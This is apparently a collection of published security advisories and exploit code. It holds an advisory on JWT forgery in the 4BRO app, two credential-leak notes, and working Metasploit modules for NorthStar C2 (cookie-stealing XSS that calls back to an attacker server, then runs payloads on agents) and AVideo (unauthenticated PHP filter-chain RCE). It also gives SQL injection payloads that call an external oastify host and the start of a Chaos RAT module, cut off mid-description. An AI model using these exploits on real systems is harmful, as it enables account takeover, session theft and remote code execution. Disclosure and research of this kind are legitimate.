<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240522-0 ><br />=======================================================================<br /> title: Broken access control & API Information Exposure<br /> product: 4BRO App<br /> vulnerable version: before 2024-04-17<br /> fixed version: 2024-04-17<br /> CVE number: -<br /> impact: Critical<br /> homepage: https://www.4bro.de<br /> found: 2023-05-07<br /> by: Max Rull (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"4BRO is a German company known for producing iced tea beverages. The brand offers<br />a variety of flavors, including unique combinations such as peach, bubblegum,<br />and watermelon mint. 4BRO emphasizes modern and appealing packaging, targeting<br />a younger demographic. The company promotes its products through various platforms<br />and incentivizes customer loyalty with their app, which allows users to collect<br />points for rewards. The company's headquarters is located in Germany, and their<br />products are widely available both online and in retail stores."<br /><br />Source: https://www.4bro.de<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor has fixed the security issues in the API server as of 2024-04-17.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Broken access control via IDOR in 4BRO app API<br />An IDOR vulnerability (Insecure Direct Object Reference) allows an attacker<br />to change the username in the Bearer token used for authentication in the 4BRO app.<br />This leads to account takeover as a result of broken access control (poor Bearer<br />token verification). Attackers are able to access all data or Bro points ("broins")<br />from other users.<br /><br /><br />2) API Information Exposure<br />When opening the app as an unauthenticated user, the 4BRO app loads JSON data<br />from a publicly available API endpoint containing sensitive data like e-mail<br />addresses of employees, internal invoices, a CV including personal information,<br />a gift card etc.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Broken access control via IDOR in 4BRO app API<br />When logging in into the 4BRO app, the server returns a JWT (JSON Web Token).<br />The "login" HTTP request looks like this:<br />--------------------------------------------------------------------------------<br />POST /api/user/signin HTTP/2<br />Host: adminpanel.4bro.de<br />Content-Type: application/json<br />[...]<br /><br />{"email":"<login email>","password":"<login password>"}<br />--------------------------------------------------------------------------------<br /><br />The server responds with a JWT used for authentication and additional<br />account-related data:<br />--------------------------------------------------------------------------------<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />[...]<br /><br />{<br /> "token": "<JWT here>",<br /> "userData": {<br /> "isBlocked": false,<br /> "_id": "[...]",<br /> "userType": "USER",<br /> "email": "<login email>",<br /> "broins": 0,<br /> "deviceId": null,<br /> "userCreationDate": "2023-XX-XXTXX:XX:XX.XXXZ",<br /> "address": [{<br /> "_id": "[...]",<br /> "streetName": "[...]",<br /> "streetNumber": "[...]",<br /> "postalcode": "[...]",<br /> "city": "[...]",<br /> "firstName": "[...]",<br /> "lastName": "[...]",<br /> "country": "at"<br /> }<br /> ],<br /> "ratings": [],<br /> "__v": 0,<br /> "pushToken": "[...]",<br /> "telekomUUID": "[...]"<br /> }<br />}<br />--------------------------------------------------------------------------------<br /><br />Because the JWT is only base64-encoded, it is easy to decode the JWT's<br />header and payload as clear text using JWT decoders like https://token.dev/:<br />--------------------------------------------------------------------------------<br />Header:<br />{<br /> "kid": "[...]",<br /> "alg": "RS256"<br />}<br />--------------------------------------------------------------------------------<br />Payload:<br />{<br /> "sub": "[...]",<br /> "event_id": "[...]",<br /> "token_use": "access",<br /> "scope": "aws.cognito.signin.user.admin",<br /> "auth_time": 1683565567,<br /> "iss": "https://cognito-idp.eu-central-1.amazonaws.com/[...]",<br /> "exp": 1683569167,<br /> "iat": 1683565567,<br /> "jti": "[...]",<br /> "client_id": "[...]",<br /> "username": "<login email>"<br />}<br />--------------------------------------------------------------------------------<br /><br />The payload of the JWT contains multiple values indicating that AWS Cognito is in use.<br />By changing the "username" value of the JWT payload to a victim email, it is possible<br />to use the modified JWT for authenticating as the victim. The victim should already<br />have a normally registered account in the 4BRO app. By trial and error, it turns out<br />that even the following modified JWT payload gets accepted by the server:<br />--------------------------------------------------------------------------------<br />{<br /> "sub": "0",<br /> "event_id": "0",<br /> "token_use": "access",<br /> "scope": "aws.cognito.signin.user.admin",<br /> "auth_time": 0,<br /> "iss": "",<br /> "exp": 0,<br /> "iat": 0,<br /> "jti": "0",<br /> "client_id": "0",<br /> "username": "<login email>"<br />}<br />--------------------------------------------------------------------------------<br /><br />Meanwhile, the "kid" property in the JWT header must be a valid value, but can belong<br />to any other already existing 4BRO app account. The JWT signature can be the same<br />and does not get verified at all.<br /><br />Using the modified JWT, all API methods supported by the 4BRO app can be executed.<br />Because the server only checks the "username" property in the JWT payload and does<br />slim to none JWT verification, the server thinks that the request came from the<br />account associated with the login email contained in the "username" property.<br /><br />This way, sensitive data such as the current "broin" balance, full user data as seen<br />in the login response, previous transactions, redeemed vouchers and goodies etc.<br />can be accessed without restrictions, using the 4BRO API. Also, the "sending broins"<br />action can be performed so that earned "broins" could be transferred to an attacker's<br />account balance.<br /><br /><br />2) API Information Exposure<br />By monitoring the 4BRO app's requests over a proxy, it can be observed that<br />the following HTTP request is made when opening the "Goodies" section of the app:<br />--------------------------------------------------------------------------------<br />GET /api/goodies?pageSize=1000 HTTP/2<br />Host: adminpanel.4bro.de<br />[...]<br />--------------------------------------------------------------------------------<br /><br />The response is a JSON object containing all goodies that are or were at some point<br />available in the 4BRO app:<br />--------------------------------------------------------------------------------<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Content-Length: 327138<br />[...]<br /><br />{<br /> "goodiesList": [{<br /> "_id": "61950603005c650530b63aac",<br /> "name": "1x 4BRO Getränk Imbiss",<br /> "longDescription": "[...]",<br /> "shortDescription": "Auf unseren Nacken!",<br /> "imagePath":<br />"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/goodies/app_kachel_food_256x256.jpg",<br /> "category": "Food",<br /> "quantity": 999999999999808,<br /> "costOfGoodie": 250,<br /> "supplier": "<email removed>",<br /> "totalGoodies": 999999999999861,<br /> "goodieAvailableTime": "Unlimited",<br /> "deliveryMethod": "partnerCoupon",<br /> "isNewGoodie": false,<br /> "inhouseAppVoucherUrl":<br />"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/inhouseAppVouchers/undefined",<br /> "__v": 1,<br /> "rating": {<br /> "value": 3.991869918699184,<br /> "total": 123<br /> },<br /> "forceGoodie": "true",<br /> "goodieAvailableEndTime": null,<br /> "goodieAvailableStartTime": null,<br /> "restriction": [],<br /> "hidden": false,<br /> "slashedCostOfGoodie": null<br /> },{<br /> [...]<br /> },<br /> [...]<br /> }<br /> ],<br /> "goodieCount": 371<br />}<br />--------------------------------------------------------------------------------<br /><br />This JSON object contains already sensitive data such as the goodie supplier's email<br />addresses. Out of the 371 goodies, 36 of those have a URL to a PDF file contained<br />within the "inhouseAppVoucherUrl" property. Because these files are hosted on an<br />AWS S3 bucket, everyone can access these documents without authentication.<br /><br />These documents seem to contain various sensitive company internal and personal<br />information.<br /><br />While discovering vulnerability 1), we found that old gift codes were also stored as<br />PDF files on the AWS S3 bucket. The names of the gift code PDF files indicate that<br />there may be more similarly named documents (IDOR) which could be detected in an<br />automated way. This could be leveraged to find additional gift code PDF files stored<br />on the AWS S3 bucket.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following app version has been tested and downloaded through Google Play store,<br />which was the most recent version available at the time of the test:<br />* 3.14.7<br /><br />Because the vulnerability is actually server-side within the API, the iOS app was<br />also affected at the time the vulnerabilities were discovered.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-12: Contacting vendor through broservice@4bro.de (owner) and info@dev5310.com<br /> (developers according to Google Play store)<br />2023-06-15: Vendor asks about the risks of the identified vulnerabilities and which<br /> parts of the application are affected and whether any costs would arise<br /> before they provide us with a security contact.<br />2023-06-16: Detailed answer regarding risk estimation, responsible disclosure and<br /> that no costs are involved.<br />2023-06-19: Vendor requests a phone conference, scheduled for 21st June.<br />2023-06-21: Clarifying responsible disclosure, explaining vulnerabilities and next<br /> steps in phone call. Providing security advisory to vendor.<br />2023-06-29: Vendor has sent the advisory to the developer team for evaluation<br /> and will notify SEC Consult about the release of the security patch.<br />2023-08-18: Asking for a status update.<br />2023-08-31: It is planned to release an Android/iOS app update end of September<br />2023-09-18: Vendor needs to postpone update, no new date available.<br />2023-11-08: Asking for a status update; no response.<br />2023-11-21: Asking for a status update.<br />2023-12-11: Vendor response, fix is available in test environment, production<br /> will be fixed by end of this year.<br />2024-01-24: Asking for a status update; no response.<br />2024-02-12: Asking for a status update.<br />2024-02-12: Vendor is still waiting for a response from their IT.<br />2024-04-17: Asking for a status update.<br />2024-04-17: Vendor states that the vulnerabilities have been fixed.<br />2024-04-17: Asking for the fix date, whether an app update was needed for applying<br /> the fix, and the fixed app version. No response.<br />2024-05-13: Asking vendor again about fixed version, etc., setting preliminary release<br /> date to 2024-05-21. No response.<br />2024-05-22: Release of security advisory<br /><br /><br /><br />Solution:<br />---------<br />The vendor implemented a fix in the affected API server as of 2024-04-17.<br />An app update on Android or iOS is not required to apply the fix.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF M. Rull / @2024<br /></code></pre>
<pre><code># Exploit Title: Debezium UI - Credential Leakage<br /><br /># Google Dork: N/A<br /><br /># Date: [2024-03-11]<br /><br /># Exploit Author: Ihsan Cetin, Hamza Kaya Toprak<br /><br /># Vendor Homepage: https://debezium.io/<br /><br /># Software Link: N/A<br /><br /># Version: < 2.5 (REQUIRED)<br /><br /># Tested on: [N/A]<br /><br /># CVE : CVE-2024-28736<br /><br />Proof of concept:<br /><br /># Details<br /><br />#Debezium-ui (version 2.5) is vulnerable to a password exposure issue that could allow an attacker to retrieve sensitive credentials in plaintext format.<br /><br /># PoC :<br /><br />#Unmasked Password in Connector Configuration: When navigating to the connectors section within the application's connector screen, the password field, which should ideally be masked for security purposes, is briefly displayed in plaintext format during the initial seconds.<br /><br /># Plaintext Password Retrieval via API Endpoint: By accessing the URL<br /><br />http://10.0.15.51:8080//api/connectors/1/account-activity/config<br /><br />#and searching for the database.password parameter, an attacker can retrieve the database password in plaintext format without any authentication.<br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: FleetCart 4.1.1 - WebPage Content Information Disclosure<br /># Exploit Author: CraCkEr<br /># Date: 13/05/2024<br /># Vendor: EnvaySoft<br /># Vendor Homepage: https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826<br /># Software Demo Link: https://demo.fleetcart.envaysoft.com/en<br /># Tested on: Windows 11 Pro 22H2<br /># Impact: Sensitive Information Leakage<br /># CWE: CWE-200 - CWE-284 - CWE-266<br /># CVE: CVE-2024-5230<br /># CAPEC: CAPEC-19 / CAPEC-116<br /># ATT&CK: T1592<br /><br /><br />## Description<br /><br />Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the "Razorpay" "razorpayKeyId".<br /><br /><br />## Steps to Reproduce:<br /><br />When you view the majority of the pages on the website, such as<br /><br />https://demo.fleetcart.envaysoft.com/en/login<br />https://demo.fleetcart.envaysoft.com/en/categories/smartphones/products<br />https://demo.fleetcart.envaysoft.com/en/products?query=123<br /><br /><br />There is information leaking in the body page response.<br /><br />+---------------------+<br />razorpayKeyId: 'rzp_test_oACp03vDsqdixc',<br />+---------------------+<br /><br /><br />Note: the same leaked "razorpayKeyId" is added to "Razorpay" in the Administration Panel.<br /><br />on this Path:<br /><br />https://demo.fleetcart.envaysoft.com/en/admin/settings?tab=razorpay (Login as Administrator)<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'NorthStar C2 XSS to Agent RCE',<br /> 'Description' => %q{<br /> NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is<br /> vulnerable to a stored xss.<br /> An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.<br /> With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts<br /> (agents), and kill the original agent.<br /><br /> Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on<br /> Ubuntu 22.04. The agent was running on Windows 10 19045.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'chebuya' # original PoC, analysis<br /> ],<br /> 'DefaultOptions' => {<br /> 'URIPATH' => '/' # avoid long URLs due to 20char limit in xss payloads<br /> },<br /> 'References' => [<br /> [ 'URL', 'https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/' ],<br /> [ 'URL', 'https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc' ],<br /> [ 'URL', 'https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c'],<br /> [ 'CVE', '2024-28741']<br /> ],<br /> 'Platform' => ['win'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2024-03-12',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [EVENT_DEPENDENT],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('TARGETURI', [ true, 'The URI of the NorthStar C2 Application', '/']),<br /> OptBool.new('KILL', [ false, 'Kill the NorthStar C2 agent', false])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'getin.php'),<br /> 'method' => 'GET'<br /> )<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> return CheckCode::Detected('NorthStar Login page detected') if res.body.include? '<title>The NorthStar Login</title>'<br /><br /> CheckCode::Safe('NorthStar C2 Login page not detected')<br /> end<br /><br /> def steal_agents(cookie)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'clients.php'),<br /> 'headers' => {<br /> 'cookie' => "PHPSESSID=#{cookie}"<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> soup = Nokogiri::HTML(res.body)<br /> rows = soup.css('tr')<br /><br /> agent_table = Rex::Text::Table.new(<br /> 'Header' => 'Live Agents',<br /> 'Indent' => 1,<br /> 'Columns' =><br /> [<br /> 'ID',<br /> 'IP',<br /> 'OS',<br /> 'Username',<br /> 'Hostname',<br /> 'Status'<br /> ]<br /> )<br /><br /> rows.each do |row|<br /> cells = row.css('td')<br /> next if cells.length != 9<br /><br /> status = cells[7].text.strip<br /> next if status != 'Online'<br /><br /> agent_id = cells[1].text.strip<br /> agent_ip = cells[2].text.strip<br /> hostname = cells[5].text.strip<br /><br /> agent_table << [agent_id, agent_ip, cells[3].text.strip, cells[4].text.strip, hostname, cells[7].text.strip]<br /> report_host(host: agent_ip, name: hostname, os_name: cells[3].text.strip, info: "Northstar C2 Agent Deployed, callback: #{datastore['RHOST']}")<br /> end<br /><br /> fail_with(Failure::NotFound, 'No live agents to exploit') if agent_table.rows.empty?<br /><br /> print_good(agent_table.to_s)<br /><br /> script_tags = soup.css('script')<br /><br /> csrf_token = nil<br /> script_tags.each do |script_tag|<br /> if script_tag.text.include?('csrfToken')<br /> csrf_token = script_tag.text.split('"')[1]<br /> break<br /> end<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find CSRF token") unless csrf_token<br /><br /> vprint_good("CSRF Token: #{csrf_token}")<br /><br /> agent_table.rows.each do |agent|<br /> agent_id = agent[0]<br /> hostname = agent[4]<br /> print_status("(#{agent_id}) Stealing #{hostname}")<br /><br /> vprint_status(" (#{agent_id}) Enabling shell mode")<br /> agent_exec(agent_id, csrf_token, cookie, 'enablecmd')<br /> vprint_status(" (#{agent_id}) Running payload")<br /> agent_exec(agent_id, csrf_token, cookie, payload.encoded)<br /> vprint_status(" (#{agent_id}) Disabling shell mode")<br /> agent_exec(agent_id, csrf_token, cookie, 'disablecmd')<br /> next unless datastore['KILL']<br /><br /> vprint_status(" (#{agent_id}) Killing NorthStar payload")<br /> agent_exec(agent_id, csrf_token, cookie, 'die')<br /> end<br /> end<br /><br /> def agent_exec(agent_id, csrf_token, cookie, command)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'functions', 'setCommand.nonfunction.php'),<br /> 'method' => 'POST',<br /> 'headers' => {<br /> 'cookie' => "PHPSESSID=#{cookie}"<br /> },<br /> 'vars_post' => {<br /> 'slave' => agent_id,<br /> 'command' => command,<br /> 'sid' => agent_id,<br /> 'token' => csrf_token<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /><br /> # 1min seems enough, NorthStar mentions 4_000ms response times...<br /> (2 * 60).times do<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'getresponse.php'),<br /> 'headers' => {<br /> 'cookie' => "PHPSESSID=#{cookie}"<br /> },<br /> 'vars_get' => {<br /> 'slave' => agent_id<br /> }<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> if !res.body.empty? || command == 'die'<br /> vprint_good(" Command sent successfully to agent #{agent_id}, response: #{res.body}")<br /> return<br /> end<br /> Rex.sleep(0.5)<br /> end<br /> end<br /><br /> def on_request_uri(cli, request)<br /> if request.method == 'GET' && @xss_response_received == false<br /> vprint_status('Received GET request.')<br /> return unless request.uri.include? '='<br /><br /> cookie = request.uri.split('PHPSESSID=')[1]<br /> print_good("Received cookie: #{cookie}")<br /> send_response_html(cli, '')<br /> @xss_response_received = true<br /> steal_agents(cookie)<br /> end<br /> send_response_html(cli, '')<br /> end<br /><br /> def xor_strings(text, key)<br /> text.chars.map.with_index { |char, i| (char.ord ^ key[i % key.length].ord).chr }.join<br /> end<br /><br /> def srvhost<br /> datastore['SRVHOST']<br /> end<br /><br /> def primer<br /> @xss_response_received = false<br /> vprint_status('Sending XSS')<br /> # divide up the host length so that it fits in our payload<br /> h1 = srvhost[0...srvhost.length / 2]<br /> h2 = srvhost[srvhost.length / 2..]<br /> sid_payloads = ['*/</script><', '*/i.src=u/*', '*/new Image;/*', '*/var i=/*', "*/s+h+p+'/'+c;/*", '*/var u=/*', "*/'http://';/*", '*/var s=/*', "*/':#{datastore['SRVPORT']}';/*", '*/var p=/*', '*/a+b;/*', '*/var h=/*', "*/'#{h2}';/*", '*/var b=/*', "*/'#{h1}';/*", '*/var a=/*', '*/d.cookie;/*', '*/var c=/*', '*/document;/*', '*/var d=/*', '</td><script>/*']<br /> sid_payloads.each do |pload|<br /> pload = "N#{pload}q"<br /> vprint_status("Sending: #{pload}")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.php'),<br /> 'method' => 'POST',<br /> 'vars_get' => {<br /> 'sid' => Rex::Text.encode_base64(xor_strings(pload, 'northstar'))<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code received: #{res.code}") unless res.code == 200<br /> end<br /> print_status('Waiting on XSS execution')<br /> end<br /><br /> def exploit<br /> fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0<br /> fail_with(Failure::BadConfig, 'SRVPORT and FETCH_SRVPORT must be different') if datastore['SRVPORT'] == datastore['FETCH_SRVPORT']<br /> super<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::PhpFilterChain<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated remote code execution (RCE) vulnerability<br /> in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the<br /> `submitIndex.php` file, where user-supplied input is passed directly to the `require()`<br /> function without proper sanitization. By exploiting this, an attacker can leverage the<br /> PHP filter chaining technique to execute arbitrary PHP code on the server. This allows<br /> for the execution of commands and control over the affected system. The exploit is<br /> particularly dangerous because it does not require authentication, making it possible<br /> for any remote attacker to exploit this vulnerability.<br /> },<br /> 'Author' => [<br /> 'Valentin Lobstein'<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2024-31819'],<br /> ['URL', 'https://github.com/WWBN/AVideo'],<br /> ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']<br /> ],<br /> 'Platform' => ['php', 'unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows In-Memory',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2024-04-09',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> },<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443,<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> }<br /> )<br /> )<br /> end<br /><br /> def exploit<br /> php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"<br /> filter_payload = generate_php_filter_payload(php_code)<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'data' => "systemRootPath=#{filter_payload}"<br /> )<br /> print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'index.php'),<br /> 'method' => 'GET',<br /> 'follow_redirect' => true<br /> })<br /> return CheckCode::Unknown('Failed to connect to the target.') unless res<br /> return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)<br /> return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]<br /><br /> version = Rex::Version.new(version_match[1])<br /> plugin_check = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),<br /> 'method' => 'GET'<br /> })<br /> unless plugin_check&.code == 200<br /> CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')<br /> end<br /><br /> if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))<br /> return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")<br /> end<br /><br /> CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")<br /> end<br />end<br /></code></pre>
<pre><code>## Titles: Chat Bot - PHP (by: oretnom23 ) v1.0 Multiple SQLi<br />## Author: nu11secur1ty<br />## Date: 05/22/2024<br />## Vendor: https://github.com/oretnom23<br />## Software:<br />https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `kw` parameter appears to be vulnerable to SQL injection attacks. The<br />payload '+(select load_file('\\\\<br />3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+' was submitted<br />in the kw parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: kw (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: kw=Write your query here'+(select load_file('\\\\<br />3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+'') OR NOT<br />5452=5452-- yJrL<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: kw=Write your query here'+(select load_file('\\\\<br />3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+'') AND (SELECT<br />6898 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT<br />(ELT(6898=6898,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ugYc<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: kw=Write your query here'+(select load_file('\\\\<br />3x1lin0l3hlhoereknh4upxdx43xrufli9aw0kp.oastify.com\\rvo'))+'') AND (SELECT<br />3334 FROM (SELECT(SLEEP(7)))MjoP)-- WPgB<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/chat-bot-php-by-104709713)<br /><br />## Proof and Exploit:<br />[href](<br />https://www.nu11secur1ty.com/2024/05/mvogms-by-oretnom23-v10-multiple-sqli_22.html<br />)<br /><br />## Time spent:<br />01:19:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Rex::Proto::Http::WebSocket<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Chaos RAT XSS to RCE',<br /> 'Description' => %q{<br /> CHAOS v5.0.8 is a free and open-source Remote Administration Tool that<br /> allows generated binaries to control remote operating systems. The<br /> webapp contains a remote command execution vulnerability which<br /> can be triggered by an authenticated user when generating a new<br /> executable. The webapp also contains an XSS vulnerability within<br /> the view of a returned command being executed on an agent.<br /><br /> Execution can happen through one of three routes:<br /><br /> 1. Provided credentials can be used to execute the RCE directly<br /><br /> 2. A JWT token from an agent can be provided to emulate a compromised<br /> host. If a logged in user attempts to execute a command on the host<br /> the returned value contains an xss payload.<br /><br /> 3. Similar to technique 2, an agent executable can be provided and the<br /> JWT token can be extracted.<br /><br /> Verified against CHAOS 